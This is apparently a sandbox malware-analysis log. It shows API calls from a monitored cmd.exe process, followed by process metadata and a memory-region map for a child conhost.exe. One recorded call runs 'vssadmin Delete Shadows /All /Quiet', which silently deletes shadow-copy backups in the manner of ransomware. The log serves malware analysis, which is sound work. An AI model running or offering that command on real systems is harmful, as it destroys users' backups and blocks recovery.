	[0300.159] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x0, Size=0x14) returned 0x46b7990
	[0300.159] FindClose (in: hFindFile=0x46b95a0 | out: hFindFile=0x46b95a0) returned 1
	[0300.159] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f288, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f288) returned 0xffffffff
	[0300.160] GetLastError () returned 0x2
	[0300.160] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f288, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f288) returned 0x46b95a0
	[0300.160] GetProcessHeap () returned 0x46b0000
	[0300.160] RtlReAllocateHeap (Heap=0x46b0000, Flags=0x0, Ptr=0x46b7990, Size=0x4) returned 0x46b7520
	[0300.160] FindClose (in: hFindFile=0x46b95a0 | out: hFindFile=0x46b95a0) returned 1
	[0300.160] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0300.160] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0300.161] GetConsoleTitleW (in: lpConsoleTitle=0x18f77c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0300.444] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f6a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f68c | out: lpAttributeList=0x18f6a8, lpSize=0x18f68c) returned 1
	[0300.444] UpdateProcThreadAttribute (in: lpAttributeList=0x18f6a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f694, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f6a8, lpPreviousValue=0x0) returned 1
	[0300.444] GetStartupInfoW (in: lpStartupInfo=0x18f6e0 | out: lpStartupInfo=0x18f6e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0300.445] GetProcessHeap () returned 0x46b0000
	[0300.445] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0x18) returned 0x46b7930
	[0300.445] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0300.445] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0300.445] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0300.445] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0300.445] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0300.447] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0300.448] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0300.449] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0300.449] GetProcessHeap () returned 0x46b0000
	[0300.450] RtlFreeHeap (HeapHandle=0x46b0000, Flags=0x0, BaseAddress=0x46b7930) returned 1
	[0300.450] GetProcessHeap () returned 0x46b0000
	[0300.450] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0xa) returned 0x46b7530
	[0300.450] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0300.454] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=I: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f630*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=I: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f67c | out: lpCommandLine="vssadmin  Delete Shadows /For=I: /All /Quiet ", lpProcessInformation=0x18f67c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xb88, dwThreadId=0xbe0)) returned 1
	[0300.494] CloseHandle (hObject=0xa4) returned 1
	[0300.495] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0300.495] GetProcessHeap () returned 0x46b0000
	[0300.495] RtlFreeHeap (HeapHandle=0x46b0000, Flags=0x0, BaseAddress=0x46badf0) returned 1
	[0300.495] GetEnvironmentStringsW () returned 0x46ba248*
	[0300.495] GetProcessHeap () returned 0x46b0000
	[0300.495] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0xb9c) returned 0x46badf0
	[0300.495] memcpy (in: _Dst=0x46badf0, _Src=0x46ba248, _Size=0xb9c | out: _Dst=0x46badf0) returned 0x46badf0
	[0300.495] FreeEnvironmentStringsA (penv="=") returned 1
	[0300.495] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0314.659] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f614 | out: lpExitCode=0x18f614*=0x2) returned 1
	[0314.661] CloseHandle (hObject=0xa8) returned 1
	[0314.662] _vsnwprintf (in: _Buffer=0x18f6fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f61c | out: _Buffer="00000002") returned 8
	[0314.663] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0314.663] GetProcessHeap () returned 0x46b0000
	[0314.664] RtlFreeHeap (HeapHandle=0x46b0000, Flags=0x0, BaseAddress=0x46badf0) returned 1
	[0314.664] GetEnvironmentStringsW () returned 0x46ba248*
	[0314.664] GetProcessHeap () returned 0x46b0000
	[0314.664] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0xbc2) returned 0x46bc568
	[0314.664] memcpy (in: _Dst=0x46bc568, _Src=0x46ba248, _Size=0xbc2 | out: _Dst=0x46bc568) returned 0x46bc568
	[0314.664] FreeEnvironmentStringsA (penv="=") returned 1
	[0314.665] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0314.665] GetProcessHeap () returned 0x46b0000
	[0314.665] RtlFreeHeap (HeapHandle=0x46b0000, Flags=0x0, BaseAddress=0x46bc568) returned 1
	[0314.665] GetEnvironmentStringsW () returned 0x46ba248*
	[0314.665] GetProcessHeap () returned 0x46b0000
	[0314.665] RtlAllocateHeap (HeapHandle=0x46b0000, Flags=0x8, Size=0xbc2) returned 0x46bc568
	[0314.665] memcpy (in: _Dst=0x46bc568, _Src=0x46ba248, _Size=0xbc2 | out: _Dst=0x46bc568) returned 0x46bc568
	[0314.665] FreeEnvironmentStringsA (penv="=") returned 1
	[0314.665] GetProcessHeap () returned 0x46b0000
	[0314.666] RtlFreeHeap (HeapHandle=0x46b0000, Flags=0x0, BaseAddress=0x46b7530) returned 1
	[0314.666] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f6a8 | out: lpAttributeList=0x18f6a8) 
	[0314.666] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0314.666] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0314.772] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0314.772] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0315.046] _get_osfhandle (_FileHandle=0) returned 0x38
	[0315.046] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0315.330] SetConsoleInputExeNameW () returned 0x1
	[0315.330] GetConsoleOutputCP () returned 0x1b5
	[0315.585] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0315.586] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0315.713] exit (_Code=2) 

Thread:
	id = 358
	os_tid = 0x1230


Process:
	id = "62"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x78881000"
	os_pid = "0x828"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "61"
	os_parent_pid = "0x4f4"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4654
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4655
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4656
	        start_va = 0x100000000
	          end_va = 0x10003ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000100000000"
	        filename = ""

Region:
	              id = 4657
	        start_va = 0x100200000
	          end_va = 0x1003fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000100200000"
	        filename = ""

Region:
	              id = 4658
	        start_va = 0x147e1290000
	          end_va = 0x147e12affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e1290000"
	        filename = ""

Region:
	              id = 4659
	        start_va = 0x147e12b0000
	          end_va = 0x147e12c4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e12b0000"
	        filename = ""

Region:
	              id = 4660
	        start_va = 0x7df5ff8c0000
	          end_va = 0x7ff5ff8bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff8c0000"
	        filename = ""

Region:
	              id = 4661
	        start_va = 0x7ff7ff620000
	          end_va = 0x7ff7ff642fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff620000"
	        filename = ""

Region:
	              id = 4662
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 4663
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4664
	        start_va = 0x147e12d0000
	          end_va = 0x147e152ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e12d0000"
	        filename = ""

Region:
	              id = 4684
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 4685
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 4686
	        start_va = 0x147e1290000
	          end_va = 0x147e129ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e1290000"
	        filename = ""

Region:
	              id = 4687
	        start_va = 0x7ff7ff520000
	          end_va = 0x7ff7ff61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff520000"
	        filename = ""

Region:
	              id = 4688
	        start_va = 0x147e12d0000
	          end_va = 0x147e138dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4689
	        start_va = 0x147e1430000
	          end_va = 0x147e152ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e1430000"
	        filename = ""

Region:
	              id = 4691
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4692
	        start_va = 0x100040000
	          end_va = 0x10007ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000100040000"
	        filename = ""

Region:
	              id = 4693
	        start_va = 0x147e1530000
	          end_va = 0x147e16effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e1530000"
	        filename = ""

Region:
	              id = 4694
	        start_va = 0x147e12a0000
	          end_va = 0x147e12a6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e12a0000"
	        filename = ""

Region:
	              id = 4695
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 4700
	        start_va = 0x147e1390000
	          end_va = 0x147e1390fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e1390000"
	        filename = ""

Region:
	              id = 4701
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4702
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4703
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4704
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4705
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4708
	        start_va = 0x147e13a0000
	          end_va = 0x147e13a6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e13a0000"
	        filename = ""

Region:
	              id = 4709
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 4710
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4711
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 4712
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4715
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 4718
	        start_va = 0x147e13b0000
	          end_va = 0x147e13b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e13b0000"
	        filename = ""

Region:
	              id = 4719
	        start_va = 0x147e13c0000
	          end_va = 0x147e13c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e13c0000"
	        filename = ""

Region:
	              id = 4720
	        start_va = 0x147e1530000
	          end_va = 0x147e16b7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e1530000"
	        filename = ""

Region:
	              id = 4721
	        start_va = 0x147e16e0000
	          end_va = 0x147e16effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e16e0000"
	        filename = ""

Region:
	              id = 4722
	        start_va = 0x147e16f0000
	          end_va = 0x147e1870fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e16f0000"
	        filename = ""

Region:
	              id = 4723
	        start_va = 0x147e1880000
	          end_va = 0x147e2c7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e1880000"
	        filename = ""

Region:
	              id = 4724
	        start_va = 0x147e13d0000
	          end_va = 0x147e13dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e13d0000"
	        filename = ""

Region:
	              id = 4725
	        start_va = 0x100080000
	          end_va = 0x1000bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000100080000"
	        filename = ""

Region:
	              id = 4726
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 4727
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4728
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 4729
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4730
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 4731
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4732
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 4756
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4757
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 4767
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 4768
	        start_va = 0x147e13e0000
	          end_va = 0x147e13fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e13e0000"
	        filename = ""

Region:
	              id = 4800
	        start_va = 0x147e2c80000
	          end_va = 0x147e2fb6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4801
	        start_va = 0x147e1400000
	          end_va = 0x147e1420fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 4802
	        start_va = 0x147e2fc0000
	          end_va = 0x147e3019fff
	       monitored = 1
	     entry_point = 0x147e2fd53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 4807
	        start_va = 0x147e2fc0000
	          end_va = 0x147e31defff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e2fc0000"
	        filename = ""

Region:
	              id = 4808
	        start_va = 0x147e31e0000
	          end_va = 0x147e33f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e31e0000"
	        filename = ""

Region:
	              id = 4810
	        start_va = 0x147e3400000
	          end_va = 0x147e350dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e3400000"
	        filename = ""

Region:
	              id = 4811
	        start_va = 0x147e3510000
	          end_va = 0x147e3721fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e3510000"
	        filename = ""

Region:
	              id = 4812
	        start_va = 0x147e3730000
	          end_va = 0x147e383afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e3730000"
	        filename = ""

Region:
	              id = 4844
	        start_va = 0x1000c0000
	          end_va = 0x1000fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000001000c0000"
	        filename = ""

Region:
	              id = 4845
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 4846
	        start_va = 0x147e13e0000
	          end_va = 0x147e13e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e13e0000"
	        filename = ""

Region:
	              id = 4847
	        start_va = 0x147e13f0000
	          end_va = 0x147e13fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000147e13f0000"
	        filename = ""

Region:
	              id = 4848
	        start_va = 0x147e3840000
	          end_va = 0x147e38fbfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000147e3840000"
	        filename = ""

Region:
	              id = 4849
